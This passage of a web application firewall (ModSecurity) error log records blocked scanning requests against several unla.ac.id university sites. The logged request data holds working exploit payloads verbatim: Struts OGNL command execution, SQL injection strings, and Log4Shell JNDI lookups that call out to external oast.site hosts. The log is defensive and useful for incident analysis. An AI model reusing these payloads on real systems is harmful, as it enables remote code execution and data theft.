"ZO11N8Co-f0AAASUXykAAAAd"]
[Tue Aug 29 11:33:59.307006 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "www.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11N8Co-f0AAASOUoYAAAAR"]
[Tue Aug 29 11:33:59.328843 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASS774AAAAY"]
[Tue Aug 29 11:33:59.349109 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASS778AAAAY"]
[Tue Aug 29 11:33:59.359039 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAAST4-EAAAAZ"]
[Tue Aug 29 11:33:59.364914 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASK4dUAAAAI"]
[Tue Aug 29 11:33:59.368147 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASOUokAAAAR"]
[Tue Aug 29 11:33:59.376323 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11N8Co-f0AAASLqBEAAAAM"]
[Tue Aug 29 11:33:59.392678 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASS78EAAAAY"]
[Tue Aug 29 11:34:00.338677 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11OMCo-f0AAASQp-IAAAAT"]
[Tue Aug 29 11:34:00.340202 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11OMCo-f0AAASMgdwAAAAO"]
[Tue Aug 29 11:34:00.353158 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASPDJYAAAAS"]
[Tue Aug 29 11:34:00.402063 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASK4dgAAAAI"]
[Tue Aug 29 11:34:00.402263 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASPDJgAAAAS"]
[Tue Aug 29 11:34:00.405437 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASNzoEAAAAQ"]
[Tue Aug 29 11:34:00.406620 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAARy-5YAAAAb"]
[Tue Aug 29 11:34:01.456047 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASIz-wAAAAG"]
[Tue Aug 29 11:34:01.457385 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAAQKOroAAAAs"]
[Tue Aug 29 11:34:01.476974 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASIz-0AAAAG"]
[Tue Aug 29 11:34:01.479381 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAAQKOrsAAAAs"]
[Tue Aug 29 11:34:01.537210 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "www.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11OcCo-f0AAASAHfkAAAAH"]
[Tue Aug 29 11:34:01.607204 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OcCo-f0AAASAHfwAAAAH"]
[Tue Aug 29 11:34:02.056422 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OsCo-f0AAAPDoL4AAAAP"]
[Tue Aug 29 11:34:02.536782 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OsCo-f0AAAPLwEgAAAAX"]
[Tue Aug 29 11:34:02.581539 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11OsCo-f0AAAPLwEoAAAAX"]
[Tue Aug 29 11:34:03.304261 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11O8Co-f0AAASLqBkAAAAM"]
[Tue Aug 29 11:34:03.329405 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgwucw5y9odg3qg.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAARy-6EAAAAb"]
[Tue Aug 29 11:34:03.334728 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg7iok7ijsmgznx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASMgewAAAAO"]
[Tue Aug 29 11:34:03.338720 2023] [:error] [pid 1169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgjx9tfmt7wa7wh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASRn-cAAAAW"]
[Tue Aug 29 11:34:03.386863 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgk38nqdchu1jte.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASLqB0AAAAM"]
[Tue Aug 29 11:34:03.406584 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgakpmr7pie1oja.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASLqB4AAAAM"]
